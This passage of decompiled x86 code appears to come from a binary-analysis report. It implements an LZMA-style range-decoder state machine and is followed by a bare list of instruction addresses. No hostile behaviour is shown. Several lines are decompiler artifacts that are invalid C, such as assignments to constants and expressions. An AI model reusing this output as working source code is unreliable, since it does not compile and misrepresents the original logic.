							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x004066a7
0x004066ae
0x004066b4
0x004066ba
0x00000000
0x004066be
0x004066ca
0x004066ca
0x004066ca
0x004066d3
0x00000000
0x00000000
0x004066d9
0x00000000
0x004066e0
0x004066e4
0x00000000
0x00000000
0x004066ed
0x004066f0
0x004066f3
0x004066f5
0x004066f7
0x00000000
0x00000000
0x004066fd
0x00406700
0x00406702
0x00406703
0x00406706
0x00406708
0x00406709
0x0040670b
0x0040670e
0x00406713
0x00406718
0x00406721
0x00406734
0x00406737
0x00406740
0x00406743
0x0040676b
0x0040676b
0x0040676d
0x0040677b
0x0040677b
0x0040677f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040676f
0x0040676f
0x00406772
0x00406772
0x00406773
0x00406773
0x00000000
0x0040676f
0x00406745
0x00406749
0x0040674e
0x0040674e
0x00406757
0x0040675d
0x0040675f
0x00406762
0x00000000
0x00406768
0x00406768
0x00000000
0x00406768
0x00000000
0x00406785
0x00406785
0x00406789
0x00407035
0x00000000
0x00407035
0x00406792
0x004067a2
0x004067a5
0x004067a8
0x004067a8
0x004067a8
0x004067ab
0x004067ab
0x004067af
0x00000000
0x00000000
0x004067b1
0x004067b4
0x004067b7
0x004067e1
0x004067e7
0x004067ee
0x00000000
0x004067ee
0x004067b9
0x004067bd
0x004067c0
0x004067c5
0x004067c5
0x004067d0
0x004067d6
0x004067d8
0x004067db
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406820
0x00406826
0x00406829
0x00406836
0x0040683e
0x00000000
0x00000000
0x004067f5
0x004067f5
0x004067f9
0x00407044
0x00000000
0x00407044
0x00406805
0x00406810
0x00406810
0x00406810
0x00406813
0x00406816
0x00406819
0x0040681c
0x0040681e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406eb5
0x00406eb5
0x00406ebb
0x00406ec1
0x00406ec4
0x00406ec7
0x00406ee1
0x00406ee4
0x00406eea
0x00406ef5
0x00406ef5
0x00406ef7
0x00406ec9
0x00406ec9
0x00406ed8
0x00406edc
0x00406edc
0x00406efa
0x00406f01
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f03
0x00406f03
0x00406f07
0x004070b6
0x00000000
0x004070b6
0x00406f13
0x00406f1a
0x00406f22
0x00406f22
0x00406f22
0x00406f25
0x00406f28
0x00406f28
0x00000000
0x00000000
0x00406846
0x00406848
0x0040684b
0x004068bc
0x004068bf
0x004068c2
0x004068c9
0x004068d3
0x00000000
0x004068d3
0x0040684d
0x00406851
0x00406854
0x00406856
0x00406859
0x0040685c
0x0040685e
0x00406861
0x00406863
0x00406868
0x0040686b
0x0040686e
0x00406872
0x00406879
0x0040687c
0x00406883
0x00406887
0x0040688f
0x0040688f
0x0040688f
0x00406889
0x00406889
0x00406889
0x0040687e
0x0040687e
0x0040687e
0x00406893
0x00406896
0x004068b4
0x004068b6
0x00000000
0x004068b6
0x00406898
0x0040689b
0x0040689e
0x004068a1
0x004068a3
0x004068a3
0x004068a3
0x004068a6
0x004068a9
0x004068ab
0x004068ac
0x004068af
0x00000000
0x00000000
0x00406ae5
0x00406ae9
0x00406b07
0x00406b0a
0x00406b11
0x00406b14
0x00406b17
0x00406b1a
0x00406b1d
0x00406b20
0x00406b22
0x00406b29
0x00406b2a
0x00406b2c
0x00406b2f
0x00406b32
0x00406b35
0x00406b35
0x00406b3a
0x00000000
0x00406b3a
0x00406aeb
0x00406aee
0x00406af1
0x00406afb
0x00000000
0x00000000
0x00406b4f
0x00406b53
0x00406b76
0x00406b79
0x00406b7c
0x00406b86
0x00406b55
0x00406b55
0x00406b58
0x00406b5b
0x00406b5e
0x00406b6b
0x00406b6e
0x00406b6e
0x00000000
0x00000000
0x00406b92
0x00406b96
0x00000000
0x00000000
0x00406b9c
0x00406ba0
0x00000000
0x00000000
0x00406ba6
0x00406ba8
0x00406bac
0x00406bac
0x00406baf
0x00406bb3
0x00000000
0x00000000
0x00406c03
0x00406c07
0x00406c0e
0x00406c11
0x00406c14
0x00406c1e
0x00000000
0x00406c1e
0x00406c09
0x00000000
0x00000000
0x00406c2a
0x00406c2e
0x00406c35
0x00406c38
0x00406c3b
0x00406c30
0x00406c30
0x00406c30
0x00406c3e
0x00406c41
0x00406c44
0x00406c44
0x00406c47
0x00406c4a
0x00406c4d
0x00406c4d
0x00406c50
0x00406c57
0x00406c5c
0x00000000
0x00000000
0x00406cea
0x00406cea
0x00406cee
0x0040708c
0x00000000
0x0040708c
0x00406cf4
0x00406cf7
0x00406cfa
0x00406cfe
0x00406d01
0x00406d07
0x00406d09
0x00406d09
0x00406d09
0x00406d0c
0x00406d0f
0x00000000
0x00000000
0x004068df
0x004068df
0x004068e3
0x00407050
0x00000000
0x00407050
0x004068e9
0x004068ec
0x004068ef
0x004068f3
0x004068f6
0x004068fc
0x004068fe
0x004068fe
0x004068fe
0x00406901
0x00406904
0x00406904
0x00406907
0x0040690a
0x00000000
0x00000000
0x00406910
0x00406916
0x00000000
0x00000000
0x0040691c
0x0040691c
0x00406920
0x00406923
0x00406926
0x00406929
0x0040692c
0x0040692d
0x00406930
0x00406932
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x0040694a
0x00406966
0x00406969
0x0040696c
0x0040696f
0x00406976
0x0040697a
0x0040697c
0x00406980
0x0040694c
0x0040694c
0x00406950
0x00406958
0x0040695d
0x0040695f
0x00406961
0x00406961
0x00406983
0x0040698a
0x0040698d
0x00000000
0x00406993
0x00000000
0x00406993
0x00000000
0x00406998
0x00406998
0x0040699c
0x0040705c
0x00000000
0x0040705c
0x004069a2
0x004069a5
0x004069a8
0x004069ac
0x004069af
0x004069b5
0x004069b7
0x004069b7
0x004069b7
0x004069ba
0x004069bd
0x004069bd
0x004069bd
0x004069c3
0x00000000
0x00000000
0x004069c5
0x004069c8
0x004069cb
0x004069ce
0x004069d1
0x004069d4
0x004069d7
0x004069da
0x004069dd
0x004069e0
0x004069e3
0x004069fb
0x004069fe
0x00406a01
0x00406a04
0x00406a04
0x00406a07
0x00406a0b
0x00406a0d
0x004069e5
0x004069e5
0x004069ed
0x004069f2
0x004069f4
0x004069f6
0x004069f6
0x00406a10
0x00406a17
0x00406a1a
0x00000000
0x00406a1c
0x00000000
0x00406a1c
0x00406a1a
0x00406a21
0x00406a21
0x00406a21
0x00406a21
0x00000000
0x00000000
0x00406a5c
0x00406a5c
0x00406a60
0x00407068
0x00000000
0x00407068
0x00406a66
0x00406a69
0x00406a6c
0x00406a70
0x00406a73
0x00406a79
0x00406a7b
0x00406a7b
0x00406a7b
0x00406a7e
0x00406a81
0x00406a81
0x00406a87
0x00406a25
0x00406a25
0x00406a28
0x00000000
0x00406a28
0x00406a89
0x00406a89
0x00406a8c
0x00406a8f
0x00406a92
0x00406a95
0x00406a98
0x00406a9b
0x00406a9e
0x00406aa1
0x00406aa4
0x00406aa7
0x00406abf
0x00406ac2
0x00406ac5
0x00406ac8
0x00406ac8
0x00406acb
0x00406acf
0x00406ad1
0x00406aa9
0x00406aa9
0x00406ab1
0x00406ab6
0x00406ab8
0x00406aba
0x00406aba
0x00406ad4
0x00406adb
0x00406ade
0x00000000
0x00406ae0
0x00000000
0x00406ae0
0x00000000
0x00406d6d
0x00406d6d
0x00406d71
0x00407098
0x00000000
0x00407098
0x00406d77
0x00406d7a
0x00406d7d
0x00406d81
0x00406d84
0x00406d8a
0x00406d8c
0x00406d8c
0x00406d8c
0x00406d8f
0x00000000
0x00000000
0x00406b3d
0x00406b3d
0x00406b40
0x00000000
0x00000000
0x00406e7c
0x00406e80
0x00406ea2
0x00406ea5
0x00406eaf
0x00406eb2
0x00406eb2
0x00000000
0x00406eb2
0x00406e82
0x00406e85
0x00406e89
0x00406e8c
0x00406e8c
0x00406e8f
0x00000000
0x00000000
0x00406f39
0x00406f3d
0x00406f5b
0x00406f5b
0x00406f5b
0x00406f62
0x00406f69
0x00406f70
0x00406f70
0x00000000
0x00406f70
0x00406f3f
0x00406f42
0x00406f45
0x00406f48
0x00406f4f
0x00406e93
0x00406e93
0x00406e96
0x00000000
0x00000000
0x0040702a
0x0040702d
0x00000000
0x00000000
0x00406c64
0x00406c66
0x00406c6d
0x00406c6e
0x00406c70
0x00406c73
0x00000000
0x00000000
0x00406c7b
0x00406c7e
0x00406c81
0x00406c83
0x00406c85
0x00406c85
0x00406c86
0x00406c89
0x00406c90
0x00406c93
0x00406ca1
0x00000000
0x00000000
0x00406f77
0x00406f77
0x00406f7a
0x00406f81
0x00000000
0x00000000
0x00406f86
0x00406f86
0x00406f8a
0x004070c2
0x00000000
0x004070c2
0x00406f90
0x00406f93
0x00406f96
0x00406f9a
0x00406f9d
0x00406fa3
0x00406fa5
0x00406fa5
0x00406fa5
0x00406fa8
0x00406fab
0x00406fab
0x00406fab
0x00406fab
0x00406fae
0x00406fae
0x00406fb2
0x00407012
0x00407015
0x0040701a
0x0040701b
0x0040701d
0x0040701f
0x00407022
0x00406f2e
0x00406f2e
0x00000000
0x00406f2e
0x00406fb4
0x00406fba
0x00406fbd
0x00406fc0
0x00406fc3
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fcf
0x00406fd2
0x00406fd5
0x00406fee
0x00406ff1
0x00406ff4
0x00406ff7
0x00406ffb
0x00406ffd
0x00406ffd
0x00406ffe
0x00407001
0x00406fd7
0x00406fd7
0x00406fdf
0x00406fe4
0x00406fe6
0x00406fe9
0x00406fe9
0x00407004
0x0040700b
0x00000000
0x0040700d
0x00000000
0x0040700d
0x00000000
0x00406ca9
0x00406cac
0x00406ce2
0x00406e12
0x00406e12
0x00406e12
